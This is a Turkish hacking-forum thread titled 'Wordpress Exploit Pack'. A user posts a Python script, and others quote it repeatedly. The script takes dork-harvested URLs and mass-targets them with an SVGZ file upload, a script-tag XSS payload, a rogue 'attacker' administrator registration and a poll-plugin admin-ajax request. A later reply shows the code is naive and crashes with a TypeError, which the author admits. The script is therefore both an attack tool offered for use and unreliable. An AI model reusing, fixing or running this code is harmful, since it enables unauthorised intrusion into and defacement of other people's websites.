Wordpress Exploit Pack

z3n

Üye
26 Kas 2023
161
96
Test edilenler: XSS, FILE UPLOAD, PRIVILEGE ESCALATION

Python:
import requests
from colorama import Fore
print(Fore.GREEN +"""______6_____________6______
_____66_____________66_____
___6666_____________6666___
__66666_____________66666__
_666666_____666_____666666_
6666666_____666_____6666666
666666666666666666666666666
666666666666666666666666666
6666666_____666_____6666666
_666666_____666_____666666_
__66666_____666_____66666__
___6666_____666_____6666___
_____66_____666_____66_____
______6_____666_____6______
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
___________66666___________
___________66666___________
___________66666___________""")
print(Fore.YELLOW + "DORKLARDAN ALDIĞINIZ URLLERİ YAZACAKSINIZ BİR DOSYAYA!!")
def istek(url, yol, diger_veriler):
    try:
        with open(yol, 'rb') as dosya:
            dosya_dict = {'dosya': (yol, dosya, 'text/plain')}
            response = requests.post(url, files=dosya_dict, data=diger_veriler)
            if response.status_code == 200:
                print(Fore.WHITE + "Başarılı İstek!")
                with open("success.txt", "a") as success_file:
                    success_file.write(f"{url}\n")
            else:
                print("Başarısız!")
    except Exception as e:
        print("Hata!", e)

yol = input(Fore.WHITE +"Dosya Yolu: ")
with open(yol, 'r') as dosya:
    hedef_siteler = dosya.read().splitlines()

dosya_adi = input("SVGZ Payload Dosya Adı: ")
with open(dosya_adi, 'rb') as dosya:
    dosya_verisi = dosya.read()
diger_veriler = {
    'test': 'test',
    'submitConfirm': 'Confirm',
    'mw_wp_form_token': '5cb9cceb4e',
    'mw-wp-form-form-id': '12',
    'mw-wp-form-form-verify-token': '942abbcfe7f25999258f96003ee29e11c0dfb92b'
}
for site in hedef_siteler:
    response = requests.post(site, files={'file': dosya_verisi}, data=diger_veriler)
    if response.status_code == 200:
        print(f"Dosya başarıyla {site} adresine yüklendi.")
        with open("success.txt", "a") as success_file:
            success_file.write(f"{site}\n")
    else:
        print(f"{site} adresine dosya yüklenirken bir hata oluştu.")
payload = {
    "action": "save_contact_form",
    "fields": {
        "your-name": "<script>alert('XSS')</script>",
        "your-email": "[email protected]",
        "your-message": "HELLO"
    }
}
for site in hedef_siteler:
    response = requests.post(site, data=payload)
    if response.status_code == 200:
        print("XSS payload successfully injected for:", site)
        with open("success.txt", "a") as success_file:
            success_file.write(f"{site} (XSS)\n")
    else:
        print("Injection failed for:", site)

yetki_payload = {
    "form_id": "registration_form",
    "form_fields": {
        "username": "attacker",
        "password": "123456",
        "email": "[email protected]",
        "role": "administrator"
    }
}
for site in hedef_siteler:
    response = requests.post(site, data=yetki_payload)
    if response.status_code == 200:
        print("Privilege escalation payload successfully executed for:", site)
        with open("success.txt", "a") as success_file:
            success_file.write(f"{site} (Yetki Yükseltme)\n")
    else:
        print("Privilege escalation failed for:", site)

zafiyetli_yol = "/wp-admin/admin-ajax.php"
zafiyetli_diger_veriler = {
    'action': 'ays_poll_maker_quick_start',
    'payload': 'data'
}
istek(hedef_siteler + zafiyetli_yol, dosya_adi, zafiyetli_diger_veriler)

Bir teşekkürü çok görmeyin.
 

Mamilate

Üye
12 Kas 2023
186
75
bilmeyenler için kodun ne amaçla kullanıldığını söylesen daha iyi olurdu ama yine de eline sağlık
 

Privarp

Anka Team Junior
8 Nis 2022
132
42
Test edilenler: XSS, FILE UPLOAD, PRIVILEGE ESCALATION

Python:
import requests
from colorama import Fore
print(Fore.GREEN +"""______6_____________6______
_____66_____________66_____
___6666_____________6666___
__66666_____________66666__
_666666_____666_____666666_
6666666_____666_____6666666
666666666666666666666666666
666666666666666666666666666
6666666_____666_____6666666
_666666_____666_____666666_
__66666_____666_____66666__
___6666_____666_____6666___
_____66_____666_____66_____
______6_____666_____6______
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
___________66666___________
___________66666___________
___________66666___________""")
print(Fore.YELLOW + "DORKLARDAN ALDIĞINIZ URLLERİ YAZACAKSINIZ BİR DOSYAYA!!")
def istek(url, yol, diger_veriler):
    try:
        with open(yol, 'rb') as dosya:
            dosya_dict = {'dosya': (yol, dosya, 'text/plain')}
            response = requests.post(url, files=dosya_dict, data=diger_veriler)
            if response.status_code == 200:
                print(Fore.WHITE + "Başarılı İstek!")
                with open("success.txt", "a") as success_file:
                    success_file.write(f"{url}\n")
            else:
                print("Başarısız!")
    except Exception as e:
        print("Hata!", e)

yol = input(Fore.WHITE +"Dosya Yolu: ")
with open(yol, 'r') as dosya:
    hedef_siteler = dosya.read().splitlines()

dosya_adi = input("SVGZ Payload Dosya Adı: ")
with open(dosya_adi, 'rb') as dosya:
    dosya_verisi = dosya.read()
diger_veriler = {
    'test': 'test',
    'submitConfirm': 'Confirm',
    'mw_wp_form_token': '5cb9cceb4e',
    'mw-wp-form-form-id': '12',
    'mw-wp-form-form-verify-token': '942abbcfe7f25999258f96003ee29e11c0dfb92b'
}
for site in hedef_siteler:
    response = requests.post(site, files={'file': dosya_verisi}, data=diger_veriler)
    if response.status_code == 200:
        print(f"Dosya başarıyla {site} adresine yüklendi.")
        with open("success.txt", "a") as success_file:
            success_file.write(f"{site}\n")
    else:
        print(f"{site} adresine dosya yüklenirken bir hata oluştu.")
payload = {
    "action": "save_contact_form",
    "fields": {
        "your-name": "<script>alert('XSS')</script>",
        "your-email": "[email protected]",
        "your-message": "HELLO"
    }
}
for site in hedef_siteler:
    response = requests.post(site, data=payload)
    if response.status_code == 200:
        print("XSS payload successfully injected for:", site)
        with open("success.txt", "a") as success_file:
            success_file.write(f"{site} (XSS)\n")
    else:
        print("Injection failed for:", site)

yetki_payload = {
    "form_id": "registration_form",
    "form_fields": {
        "username": "attacker",
        "password": "123456",
        "email": "[email protected]",
        "role": "administrator"
    }
}
for site in hedef_siteler:
    response = requests.post(site, data=yetki_payload)
    if response.status_code == 200:
        print("Privilege escalation payload successfully executed for:", site)
        with open("success.txt", "a") as success_file:
            success_file.write(f"{site} (Yetki Yükseltme)\n")
    else:
        print("Privilege escalation failed for:", site)

zafiyetli_yol = "/wp-admin/admin-ajax.php"
zafiyetli_diger_veriler = {
    'action': 'ays_poll_maker_quick_start',
    'payload': 'data'
}
istek(hedef_siteler + zafiyetli_yol, dosya_adi, zafiyetli_diger_veriler)

Bir teşekkürü çok görmeyin.
Teşekkürler eline sağlık :)
 

Yagami Light0

Katılımcı Üye
5 May 2023
725
335
23
Test edilenler: XSS, FILE UPLOAD, PRIVILEGE ESCALATION

Python:
import requests
from colorama import Fore
print(Fore.GREEN +"""______6_____________6______
_____66_____________66_____
___6666_____________6666___
__66666_____________66666__
_666666_____666_____666666_
6666666_____666_____6666666
666666666666666666666666666
666666666666666666666666666
6666666_____666_____6666666
_666666_____666_____666666_
__66666_____666_____66666__
___6666_____666_____6666___
_____66_____666_____66_____
______6_____666_____6______
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
____________666____________
___________66666___________
___________66666___________
___________66666___________""")
print(Fore.YELLOW + "DORKLARDAN ALDIĞINIZ URLLERİ YAZACAKSINIZ BİR DOSYAYA!!")
def istek(url, yol, diger_veriler):
    try:
        with open(yol, 'rb') as dosya:
            dosya_dict = {'dosya': (yol, dosya, 'text/plain')}
            response = requests.post(url, files=dosya_dict, data=diger_veriler)
            if response.status_code == 200:
                print(Fore.WHITE + "Başarılı İstek!")
                with open("success.txt", "a") as success_file:
                    success_file.write(f"{url}\n")
            else:
                print("Başarısız!")
    except Exception as e:
        print("Hata!", e)

yol = input(Fore.WHITE +"Dosya Yolu: ")
with open(yol, 'r') as dosya:
    hedef_siteler = dosya.read().splitlines()

dosya_adi = input("SVGZ Payload Dosya Adı: ")
with open(dosya_adi, 'rb') as dosya:
    dosya_verisi = dosya.read()
diger_veriler = {
    'test': 'test',
    'submitConfirm': 'Confirm',
    'mw_wp_form_token': '5cb9cceb4e',
    'mw-wp-form-form-id': '12',
    'mw-wp-form-form-verify-token': '942abbcfe7f25999258f96003ee29e11c0dfb92b'
}
for site in hedef_siteler:
    response = requests.post(site, files={'file': dosya_verisi}, data=diger_veriler)
    if response.status_code == 200:
        print(f"Dosya başarıyla {site} adresine yüklendi.")
        with open("success.txt", "a") as success_file:
            success_file.write(f"{site}\n")
    else:
        print(f"{site} adresine dosya yüklenirken bir hata oluştu.")
payload = {
    "action": "save_contact_form",
    "fields": {
        "your-name": "<script>alert('XSS')</script>",
        "your-email": "[email protected]",
        "your-message": "HELLO"
    }
}
for site in hedef_siteler:
    response = requests.post(site, data=payload)
    if response.status_code == 200:
        print("XSS payload successfully injected for:", site)
        with open("success.txt", "a") as success_file:
            success_file.write(f"{site} (XSS)\n")
    else:
        print("Injection failed for:", site)

yetki_payload = {
    "form_id": "registration_form",
    "form_fields": {
        "username": "attacker",
        "password": "123456",
        "email": "[email protected]",
        "role": "administrator"
    }
}
for site in hedef_siteler:
    response = requests.post(site, data=yetki_payload)
    if response.status_code == 200:
        print("Privilege escalation payload successfully executed for:", site)
        with open("success.txt", "a") as success_file:
            success_file.write(f"{site} (Yetki Yükseltme)\n")
    else:
        print("Privilege escalation failed for:", site)

zafiyetli_yol = "/wp-admin/admin-ajax.php"
zafiyetli_diger_veriler = {
    'action': 'ays_poll_maker_quick_start',
    'payload': 'data'
}
istek(hedef_siteler + zafiyetli_yol, dosya_adi, zafiyetli_diger_veriler)

Bir teşekkürü çok görmeyin.
kendinizi kandirmayin , eline saglik yazanlarda en azindan bir goz ucuyla baksinlar kod . sana tek sorum kodu denedinmi hic? koskoca xss zafiyyetini
"your-name": "<script>alert('XSS')</script>",
bunami sigdirdin? ha bide Privilege escalation zafiyyetinide asagida verdigim kisimdaki role : "administrator" ile buluyorsun herhalde (ne diyeyim)
"form_fields": {
"username": "attacker",
"password": "123456",
"email": "[email protected]",
"role": "administrator"
}
xss saldırısı için bu "payloadin" sitedeki her hangi bir forma veya urldeki bir parametre eklenmesi gerek ancak senin kodun sadece post isteği gönderiyor ve normal olarak payload dogru yere iletilmiyor . bunun kod kismini asagiya birakiyorum
for site in hedef_siteler:
response = requests.post(site, data=payload)
if response.status_code == 200:
print("XSS payload successfully injected for:", site)
form actionu save_contact_form seklinde , sen butun sitelerde contact form olduguna eminmisin?
sürpriz sona sakladim tabi , typeerror :))
Traceback (most recent call last):
File "c:/Users/User/Desktop/django-blog-main/a.py", line 114, in <module>
istek(hedef_siteler + zafiyetli_yol, dosya_adi, zafiyetli_diger_veriler)
TypeError: can only concatenate list (not "str") to list
ey exploit yazan arkadasim pythonda listelerle stringler birlestirilemez .
burda bitirmek istiyorum daha cok bakarsam daha fazla seyler gorurum diye , exploit yazmaya bir tik acele etmissin sanki ,muhtemelen bu yorumdan sonra benden nefret edeceksin ancak "eline saglik" yazipda senin bu tur kendin icin yararsiz seyler yazmani/yapmani istemedim .
 

z3n

Üye
26 Kas 2023
161
96
kendinizi kandirmayin , eline saglik yazanlarda en azindan bir goz ucuyla baksinlar kod . sana tek sorum kodu denedinmi hic? koskoca xss zafiyyetini
"your-name": "<script>alert('XSS')</script>",
bunami sigdirdin? ha bide Privilege escalation zafiyyetinide asagida verdigim kisimdaki role : "administrator" ile buluyorsun herhalde (ne diyeyim)
"form_fields": {
"username": "attacker",
"password": "123456",
"email": "[email protected]",
"role": "administrator"
}
xss saldırısı için bu "payloadin" sitedeki her hangi bir forma veya urldeki bir parametre eklenmesi gerek ancak senin kodun sadece post isteği gönderiyor ve normal olarak payload dogru yere iletilmiyor . bunun kod kismini asagiya birakiyorum
for site in hedef_siteler:
response = requests.post(site, data=payload)
if response.status_code == 200:
print("XSS payload successfully injected for:", site)
form actionu save_contact_form seklinde , sen butun sitelerde contact form olduguna eminmisin?
sürpriz sona sakladim tabi , typeerror :))
Traceback (most recent call last):
File "c:/Users/User/Desktop/django-blog-main/a.py", line 114, in <module>
istek(hedef_siteler + zafiyetli_yol, dosya_adi, zafiyetli_diger_veriler)
TypeError: can only concatenate list (not "str") to list
ey exploit yazan arkadasim pythonda listelerle stringler birlestirilemez .
burda bitirmek istiyorum daha cok bakarsam daha fazla seyler gorurum diye , exploit yazmaya bir tik acele etmissin sanki ,muhtemelen bu yorumdan sonra benden nefret edeceksin ancak "eline saglik" yazipda senin bu tur kendin icin yararsiz seyler yazmani/yapmani istemedim .
Çok haklısın sağol. Bu kod biraz aceleme geldi yeni exploitlerim daha iyi olur diye düşünüyorum. İyi günler
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.